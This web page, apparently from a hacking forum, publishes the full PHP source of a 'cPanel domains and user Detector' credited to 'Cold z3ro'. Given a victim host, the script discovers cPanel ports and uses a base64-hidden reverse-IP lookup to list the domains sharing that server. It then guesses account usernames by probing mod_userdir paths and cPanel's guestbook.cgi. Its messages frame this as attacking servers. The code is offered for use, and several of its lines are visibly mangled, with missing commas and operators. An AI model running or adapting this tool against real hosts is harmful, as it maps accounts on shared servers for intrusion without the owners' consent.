facebook facebook twitter rss

cPanel domains and user Detector

Author: Cold z3ro , Published: 27-11-2014
<? session_start(); ?>
<style>
a:link {color:#FF0000; text-decoration:none;}
a:visited {color:#63C; text-decoration:none;}
a:hover {color:#669900; text-decoration:none;}
.ht{ background:#eae9e9; padding:20px; border-radius:20px; font-size:large}
</style>
<title> Hackteach Lovers Remote cPanel domains and user Detector </title>
<div align="center" class="ht">Hackteach Lovers Remote cPanel domains and user Detector <a href="https://www.facebook.com/groups/hackteach.org/">www.hackteach.org</a></div>
<?php

/* 
    Licence:
    co[d]ed by Cold z3ro 
    FB : https://www.facebook.com/groups/hackteach.org/
    homepage : www.hackteach.org

    Description:
    * this program has been founded for grep users for all sites located in
      one server remotely so its not need to be in the same host 

    How to use:
    * link the file with variable "h" with domain name or server ip 
      like the following  cPanel.php?h=victemhost.com .
    * some good stuff :
    1. https://www.facebook.com/photo.php?fbid=867643286593184
    2. https://www.facebook.com/photo.php?fbid=867643436593169
    3. https://www.facebook.com/photo.php?fbid=867643459926500

 */
ini_set('xdebug.max_nesting_level'10000000000000000);
ini_set('memory_limit'1024 1024 1024);
ini_set("max_execution_time""on");
 
function 
httpsPort($http)
{
        
$ports = array('2083','2087','2096');
        
$http  correctit($http);
        foreach(
$ports as $key => $port)
        {
                if(
iscPanel($http$port"port") == true)
                {
                        
$_SESSION['port'] = $port;
                        
$_SESSION['http'] = $http;
                        echo 
"[+] cPanel server => Port:".$_SESSION['port']."<br>[+] checking some fetures..<br>"; break;
                }else{
                        echo 
"ERR port:$port not reachable<br>";
                }
       
        }
        if (!
$_SESSION['port'] || !$_SESSION['http'])
        {
                die (
'Not cPanel server !! <a href="https://www.facebook.com/m.z3ro">report bug to developer</a> if its realy cPanel server');
        }
}
 
function 
zip($http$svale$evale)
{
        @
preg_match_all(';'.$svale.'(.*?)'.$evale.';is'$http$zht);
       
        if(
count($zht[0]) ==0)
        {
                die(
"HTcore Error:\n\nCan't get server domains in this version\nBuy the full code version from devloper\nhttps://www.facebook.com/m.z3ro</textarea><form>");
        }else{
                foreach (
$zht[0] as $key => $domain)
                {
                        echo @
preg_replace('/(Reverse.+?)+(Date)/i','',@strip_tags($domain)),"\n";
                }
        }
}
 
function 
htextra($htip)
{
        
// use only in the free version
        
$extract base64_decode("aHR0cDovL3d3dy52aWV3ZG5zLmluZm8vcmV2ZXJzZWlwLz9ob3N0PQ==") .$htip"&t=1";
        
$returndomains zip(iscPanel($extract"""hostbydomains"), '</td></tr><tr><td>''</td><td align="center">');
        if(
$returndomains !="")
        {
                return 
$returndomains;
        }
}
 
function 
iscPanel($http$port$type)
{
        
$curl curl_init();# Create Curl Object
        
curl_setopt($curlCURLOPT_SSL_VERIFYPEER,0);# Allow self-signed certs
        
curl_setopt($curlCURLOPT_SSL_VERIFYHOST,0);# Allow certs that do not match the hostname
        
curl_setopt($curlCURLOPT_HEADER,0);# Do not include header in output
        
curl_setopt($curlCURLOPT_RETURNTRANSFER,1);# Return contents of transfer on curl_exec
        
curl_setopt($curlCURLOPT_CONNECTTIMEOUT10);#The number of seconds to wait while trying to connect. Use 0 to wait indefinitely.
        
curl_setopt($curlCURLOPT_TIMEOUT30);#The maximum number of seconds to allow cURL functions to execute.
       
        
switch($type)
        {
                case 
"hostbydomains";
                {
                        
curl_setopt($curlCURLOPT_USERAGENT'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
                        
curl_setopt($curlCURLOPT_URL$http);
                        if (
curl_exec($curl))
                        {
                        return 
curl_exec($curl);
                        }
                }break;
               
                case 
"zguestbook";
                {
                        
curl_setopt($curlCURLOPT_USERAGENT'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
                        
curl_setopt($curlCURLOPT_URL$http);
                        
$execute curl_exec($curl);
                        
$code curl_getinfo($curlCURLINFO_HTTP_CODE);
                        if (
$execute)
                        {
                                
$code curl_getinfo($curlCURLINFO_HTTP_CODE);
                        if(
$code == "200" && preg_match("#".$port."#i",$execute))
                                {
                                        return 
true;   
                                }else{
                                        return 
false;
                                }
                        }
                }break;
               
                case 
"zuserdir";
                {
                        
curl_setopt($curlCURLOPT_USERAGENT'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
                        
curl_setopt($curlCURLOPT_URL$http);
                        
$execute curl_exec($curl);
                        
$code curl_getinfo($curlCURLINFO_HTTP_CODE);
                        if (
$execute)
                        {
                                
$code curl_getinfo($curlCURLINFO_HTTP_CODE);
                        if(
$code == "200" && !preg_match("#404 Not Found#i",$execute))
                                {
                                        return 
true;   
                                }else{
                                        return 
false;
                                }
                        }
                }break;
               
                case 
"port";
                {
                        
curl_setopt($curlCURLOPT_URL"https://".$http.":".$port."/");
                        if (
curl_exec($curl))
                        {
                        return 
true;
                        }
                }break;
               
                case 
"moduserdir";
                {
                        
curl_setopt($curlCURLOPT_URL"http://".$http."/~operator/");
                       
                        if (
curl_exec($curl))
                        {
                                
$code curl_getinfo($curlCURLINFO_HTTP_CODE);
                        if(
$code == "403")
                                {
                                        return 
true;   
                                }else{
                                        return 
false;
                                }
                }
                }break;
               
                case 
"guestbook";
                {
                        
curl_setopt($curlCURLOPT_URL"http://".$http."/cgi-sys/guestbook.cgi");
                        
$code curl_getinfo($curlCURLINFO_HTTP_CODE);
                        if (
curl_exec($curl))
                        {
                                
$code curl_getinfo($curlCURLINFO_HTTP_CODE);
                        if(
$code == "200" && preg_match(";No Username given;i",curl_exec($curl)))
                                {
                                        return 
true;   
                                }else{
                                        return 
false;
                                }
                        }
                }break;
        }
 
        
curl_close($curl);
}
function 
correctit($http)
{
        if ((
strpos(trim($http), "http://") === 0) || (strpos(trim($http), "https://") === 0))
        {
                return 
parse_url($httpPHP_URL_HOST);
        }else{
                return 
trim($http);
        }
}
 
if(isset(
$_GET['h']))
{
        
$serverip gethostbyname(correctit($_GET['h']));
        if(
$serverip == trim($_SESSION['htip']))
        {
                if (isset(
$_POST['destroy']))
                {
                        
$pagedirectlink "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
                        unset(
$_SESSION['htip']);
                        unset(
$_SESSION['http']);
                       
                        die (
"<script> window.location='".$pagedirectlink."' </script>");
                }
                echo  
$_SESSION['http'] ." This domain has been used for checking "$_SESSION['htip'] ." server<br>
                Start over <form method='POST'><input type='submit' name='destroy' value='destroy'></form>
                <br>Results:<br>"
;
                
print_r($_SESSION['result'][$serverip]);
                exit;
        }else{
                unset(
$_SESSION['htip']);
                unset(
$_SESSION['http']);
                unset(
$_SESSION['port']);      
        }
        
httpsPort($_GET['h'])."<br>";
        if(
$_SESSION['port'] && $_SESSION['http'])
        {
                if(
iscPanel($_SESSION['http'], """moduserdir")== true)
                {
                        echo 
"<br>[+] mod_userdir avalible <a href='?htc=userdir'>[ USE ]</a><br>";
                }else{
                        echo 
"<br>[+] mod_userdir not avalible<br>";
                }
                if(
iscPanel($_SESSION['http'], """guestbook")== true)
                {
                        echo 
"[+] cPanel guestbook avalible <a href='?htc=guestbook'>[ USE ]</a>";
                }else{
                        echo 
"<br>[+] cPanel guestbook not avalible<br>";
                }
                
//gethostbyname($_SESSION['http']);
        
}else{
                die(
"HTcore Error: server is not attackable"); 
        }
}
 
$action $_GET['htc'];
$_SESSION['htip'] = gethostbyname($_SESSION['http']);
$htip $_SESSION['htip'];
$randArr = array();
switch(
$action)
{
        case 
'userdir':
        {
 
                echo 
"[+] Webserver : <a href='http://"$htip ."' target='_new'> "$htip ." </a>";
                echo 
"<br>[+] Attack type: mod_userdir <br><div align='center'><form method='POST'><textarea cols='50' rows='10' name='https' style='border: 1px dotted #000;' size='29' >";
                if(empty(
$_POST['https']))
                {
                        echo 
htextra($htip);
                }else{
                        echo 
$_POST['https'];
                }
                 echo
"</textarea><br><input type='submit' name='zext'></form></div>";
                 
                if (isset(
$_POST['zext']))
                {
                        if (
$_POST['https'] =="")
                        {
                                die(
'Enter weblinks');
                        }
                        
$s '#9dc4d1';
                        foreach (
explode("<br />",nl2br($_POST['https'])) as $weblink)
                        {
                               
                                
$https correctit($weblink);
                                if(
filter_var("http://".$httpsFILTER_VALIDATE_URL))
                                {
                                        
$httpd str_replace('-','',$https);
                                        
$users explode('.',$httpd);
 
                                        for (
$i 3$i <= 8$i++)
                                        {
                                                
$htips $htip;
                                                
$user substr($users[0],0,$i);
                                
$http "http://".$htips."/~".$user."/";
                                                if(
iscPanel($http"""zuserdir")==true)
                                                {
                                                        
$result ="<div style='background:".$s."'>".$https .":"$user."</div>";
                                                       
                                                        
$randArr[] = $result;
                                                        
$_SESSION['result'][$htip] =$randArr;
                                       
                                                        echo 
$result;
                                                        break;
                                                }
                                }
                               
                                }
                                
$s $s == '#eae9e9' '#9dc4d1' '#eae9e9' ;
                        }
                }
        }
        break;
       
        
///
        
case 'guestbook':
        {
                echo 
"[+] Webserver : <a href='http://"$htip ."' target='_new'> "$htip ." </a>";
 
 
                echo 
"<br>[+] Attack type: guestbook <br><div align='center'><form method='POST'><textarea cols='50' rows='10' name='https' style='border: 1px dotted #000;' size='29' >";
                if(empty(
$_POST['https']))
                {
                        echo 
htextra($htip);
                }else{
                        echo 
$_POST['https'];
                }
                 echo
"</textarea><br><input type='submit' name='zext'></form></div>";
                 
                if (isset(
$_POST['zext']))
                {
                        if (
$_POST['https'] =="")
                        {
                                die(
'Enter weblinks');
                        }
                        
$s '#9dc4d1';
                        foreach (
explode("<br />",nl2br($_POST['https'])) as $weblink)
                        {
                               
                                
$https correctit($weblink);
                                if(
filter_var("http://".$httpsFILTER_VALIDATE_URL))
                                {
                                        
$httpd str_replace('-','',$https);
                                        
$users explode('.',$httpd);
 
                                        for (
$i 3$i <= 8$i++)
                                        {
                                                
$htips $htip;
                                                
$user substr($users[0],0,$i);
                                
$http "http://".$htips."/cgi-sys/guestbook.cgi?user=".$user;
                                                if(
iscPanel($http$user"zguestbook")==true)
                                                {
                                                        
$result ="<div style='background:".$s."'>".$https .":"$user."</div>";
                                                       
                                                        
$randArr[] = $result;
                                                        
$_SESSION['result'][$htip] =$randArr;
                                       
                                                        echo 
$result;
                                                        break;
                                                }
                                }
                               
                                }
                                
$s $s == '#eae9e9' '#9dc4d1' '#eae9e9' ;
                        }
                }
        }
        break;
       
}
 
 
?>

<div align="center" style="padding:25px;">co[d]ed by Cold z3ro</div>

Like us on Facebook :